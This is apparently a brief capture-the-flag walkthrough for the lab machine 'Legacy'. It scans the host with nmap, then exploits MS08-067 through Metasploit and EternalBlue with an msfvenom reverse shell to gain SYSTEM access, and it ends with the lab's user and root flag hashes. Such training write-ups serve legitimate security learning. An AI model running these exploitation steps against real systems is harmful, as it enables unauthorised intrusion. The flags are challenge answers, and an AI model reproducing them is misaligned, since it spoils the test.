legacy
nmap
nmap -sC -sV -oA nmap/legacy 10.10.10.4nmap vuln
nmap --script vulns 10.10.10.4nmap is showing legacy is vulnerable to BOTH MS08-067 aka netapi
and ms17-010 aka eternal blue
both exploits are infamous as to how well they work against their targets, so its up to personal preference which one you would like to use here
metasploit
https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapimsf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show targets
...targets...
msf exploit(ms08_067_netapi) > set TARGET < target-id >
msf exploit(ms08_067_netapi) > show options
...show and set options...
msf exploit(ms08_067_netapi) > exploit
search netapi
use 3
show options
rhosts is a required parameter so we'll set that with
set rhosts 10.10.10.4
but notice we also have to change our lport since it is not using our tunnel's ip
set lhost tun0
show options one more time:
and run
and we have a shell with system privileges!
manual
for our manual exploit we're going to use eternal blueclone eternal blue repo
create reverse shell with msfvenom named eternal_blue.exe
out of the following codes,
use send_and_execute.py with target IP and reverse shell code
python send_and_execute.py 10.10.10.4 eternal_blue.exe
we get back a shell!
unfortunately our shell is a bit limited to baseline commands such as whoami but after navigating around, our owned
user has system privileges
user/root
e69af0e4f443de7e36876fda4ec7644f
993442d258b0e0ec917cae9e695d5713